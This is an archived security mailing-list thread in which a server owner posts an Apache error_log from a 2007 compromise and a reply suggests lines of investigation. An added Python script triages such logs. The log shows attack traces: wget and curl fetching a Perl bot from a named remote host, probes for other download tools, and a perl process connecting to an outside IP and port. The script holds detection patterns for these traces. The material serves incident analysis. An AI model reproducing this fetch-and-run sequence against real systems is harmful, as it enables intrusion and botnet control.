Security Basics mailing list archives
Re: Analys of an apache log following a hack.
From: Santiago Barahona <sant-bar () dsv su se>
Date: Wed, 11 Apr 2007 08:13:51 +0200
Salut Greg,

Please correct me if I am wrong: if there was a buffer overflow in your Apache server, you would normally see a laaaarge string of nonsense characters in the log...

What about the MaxClients setting?... wouldn't that be a trace of a DoS? Did you take a look at the perl script that it is downloading?? (http://r00ting.org/b)

Why don't you make a search on the vulnerabilities for your specific configuration... OS, DB, Apache version? That might give you a good point to start looking.
regards,
santiago

On 10 Apr 07, at 12:11, Gregory Boddin wrote:

Hello, this is my first mail to the SecurityFocus mailing list. First, thanks for this community and for your attention.

Well, my server was hacked one week ago, and I found this in the Apache error_log.
The system was cleaned after that, but I want to know more about this. I think that someone has used a buffer overflow in the httpd (Apache) server.
Can you confirm that? Thank you very much for your answer. (Excuse my English, I am French.)

[APACHE ERROR LOG]
[Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@*****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36--  http://www.r00ting.org/b
           => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]
0K .......... .......... ......   100%   41.93 KB/s
00:05:37 (41.93 KB/s) - `b' saved [27606/27606]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 27606  100 27606    0     0   5315      0  0:00:05  0:00:05 --:--:-- 72383
sh: lynx: command not found
sh: fetch: command not found
--00:22:32--  http://www.r00ting.org/b
           => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]
0K .......... .......... ......   100%   58.23 KB/s
00:22:34 (58.23 KB/s) - `b' saved [27606/27606]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 27606  100 27606    0     0  33291      0 --:--:-- --:--:-- --:--:-- 60817
sh: lynx: command not found
sh: fetch: command not found
Undefined subroutine &main::getnick called at b line 304.
sh: line 1:  5148 Killed                  perl p 201.43.174.146 7171 120 2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down
[Tue Apr 03 10:47:27 2007] [notice] Apache configured -- resuming normal operations
[Tue Apr 03 10:55:36 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sh: /cd: No such file or directory
[Thu Apr 05 15:18:35 2007] [warn] child process 10245 still did not exit, sending a SIGTERM
[Thu Apr 05 15:18:35 2007] [warn] child process 10246 still did not exit, sending a SIGTERM
[Thu Apr 05 15:20:56 2007] [notice] Apache configured -- resuming normal operations
[Thu Apr 05 16:10:09 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Fri Apr 06 22:10:26 2007] [notice] caught SIGTERM, shutting down
[Fri Apr 06 22:45:56 2007] [notice] Apache configured -- resuming normal operations
[Fri Apr 06 23:50:46 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Sun Apr 08 00:43:49 2007] [notice] caught SIGTERM, shutting down
[Sun Apr 08 00:48:00 2007] [notice] Apache configured -- resuming normal operations
[Sun Apr 08 02:52:34 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
[/APACHE ERROR LOG]

Thank you.
Greg
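An added example, not part of either message above: a small Python triage script for an error_log like the one Greg posted. It relies on one fact about Apache's error_log that is worth more than guessing at the entry point: httpd's own entries carry a "[date] [level]" prefix, and anything without that prefix is stderr from a process httpd (or a CGI/PHP script under it) spawned. wget and curl progress output, "sh: lynx: command not found", a killed perl process and a "Undefined subroutine" message are therefore evidence that commands were executed as the httpd user, whichever way the attacker got to run them. The indicator patterns and the sample excerpt are mine (the excerpt is the posted log split back into one entry per line); the script names no vulnerability and assumes the Apache 1.3/2.0/2.2 error_log format seen in the thread.

```python
import re
from collections import Counter

# httpd's own entries carry a "[Day Mon DD HH:MM:SS YYYY] [level]" prefix
# (Apache 1.3 / 2.0 / 2.2 error_log format, as in the posted log).
APACHE_ENTRY = re.compile(r"^\[(\w{3} \w{3} \d{2} \d{2}:\d{2}:\d{2} \d{4})\] \[(\w+)\]")

# Everything else in error_log is stderr from a process httpd spawned. These
# patterns are my own and cover the kinds of stderr in the posted log; a match
# is evidence that commands ran as the httpd user, not proof of how they got there.
INDICATORS = [
    ("download-tool", re.compile(r"--\d{2}:\d{2}:\d{2}--\s+https?://")),   # wget start banner
    ("download-tool", re.compile(r"saved \[\d+/\d+\]")),                 # wget completion
    ("download-tool", re.compile(r"% Total\s+% Received\s+% Xferd")),    # curl progress header
    ("shell-probe", re.compile(r"^sh: (\S+): command not found")),       # dropper trying tools in turn
    ("shell-error", re.compile(r"^sh: (\S+): No such file or directory")),
    ("process-killed", re.compile(r"^sh: line \d+:\s+\d+ Killed\s+(.*\S)")),
    ("script-error", re.compile(r"Undefined subroutine &\S+ called at (\S+) line \d+")),
    ("php-error", re.compile(r"Allowed memory size of \d+ bytes exhausted")),
]

URL_RE = re.compile(r"https?://[^\s'\"`|]+")
IP_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def classify_line(line):
    """Return (category, detail) for one error_log line."""
    line = line.rstrip("\n")
    m = APACHE_ENTRY.match(line)
    if m:
        return ("apache", m.group(2))
    for cat, rx in INDICATORS:
        m = rx.search(line)
        if m:
            return (cat, m.group(1) if m.groups() else m.group(0))
    if line.startswith("sendmail:"):
        return ("sendmail", line)
    return ("unknown", line)


def triage(lines):
    """Summarise signs of spawned-process activity in an error_log.

    Child-process stderr carries no timestamp, so each indicator is recorded with
    the most recent httpd entry seen before it; that brackets when it happened.
    """
    summary = {
        "counts": Counter(),
        "urls": set(),           # remote resources fetched by download tools
        "peers": set(),          # (ip, port) arguments of the killed process
        "missing_tools": set(),  # tools a dropper looked for and did not find
        "events": [],            # (last httpd timestamp, category, detail)
    }
    last_ts = None
    for line in lines:
        cat, detail = classify_line(line)
        summary["counts"][cat] += 1
        if cat == "apache":
            last_ts = APACHE_ENTRY.match(line).group(1)
            continue
        for url in URL_RE.findall(line):
            summary["urls"].add(url)
        if cat == "shell-probe":
            summary["missing_tools"].add(detail)
        if cat == "process-killed":
            for ip, port in IP_PORT_RE.findall(detail):
                summary["peers"].add((ip, int(port)))
        if cat not in ("unknown", "sendmail"):
            summary["events"].append((last_ts, cat, detail))
    return summary


# Sample input: an excerpt of the log posted in the thread, one entry per line.
SAMPLE_LOG = """\
[Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: fatal: No recipient addresses found in message header
[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36--  http://www.r00ting.org/b => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
00:05:37 (41.93 KB/s) - `b' saved [27606/27606]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
sh: lynx: command not found
sh: fetch: command not found
Undefined subroutine &main::getnick called at b line 304.
sh: line 1:  5148 Killed                  perl p 201.43.174.146 7171 120 2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down
sh: /cd: No such file or directory
"""


if __name__ == "__main__":
    s = triage(SAMPLE_LOG.splitlines())
    print("line categories:", dict(s["counts"]))
    print("fetched URLs:", sorted(s["urls"]))
    print("tools the dropper looked for:", sorted(s["missing_tools"]))
    print("peers of the killed process:", sorted(s["peers"]))
    for ts, cat, detail in s["events"]:
        print(f"after [{ts}] {cat}: {detail}")
```

The timestamps it reports are only brackets: the stderr lines sit between the httpd entries around them, so the next step is to read access_log for the same windows and find the request that caused the fetch. The sendmail lines are left out of the event list on purpose; they appear throughout the posted log and say nothing on their own about who ran what.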